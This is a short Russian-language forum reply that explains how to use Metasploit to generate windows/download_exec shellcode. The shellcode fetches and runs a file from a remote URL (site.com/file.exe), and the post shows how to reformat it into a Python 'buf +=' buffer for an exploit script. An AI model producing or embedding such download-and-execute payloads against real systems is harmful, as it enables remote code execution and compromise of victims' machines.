Показать сообщение отдельно

  #2  
Старый 28.04.2010, 12:20
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

Устанаваливаешь metasploit (думаю не надо описывать как это делать)

Запускаешь
Цитата:
$ msfconsole
msf > show payloads # Просматриваешь все шелкоды
Payloads
========

Name Rank Description
---- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline


windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > info windows/download_exec # Просматриваешь информацию о шелкоде
...
msf> use windows/download_exec # выбираешь понравившийся тебе шелкод
msf payload(download_exec) > set URL http://site.com/file.exe # устанавливаешь параметры шелкода
msf payload(download_exec) > generate -t ruby # генерируешь шелкод под ruby синтаксис(т.к. для питоновского нет, но ruby похож на него)
ну или все перечисленное можно сделать в одну команду
Цитата:
msfpayload windows/download_exec URL=http://site.com/file.exe ruby
теперь убери в каждой строке "+", а в начало поставь "buf +="
 
Ответить с цитированием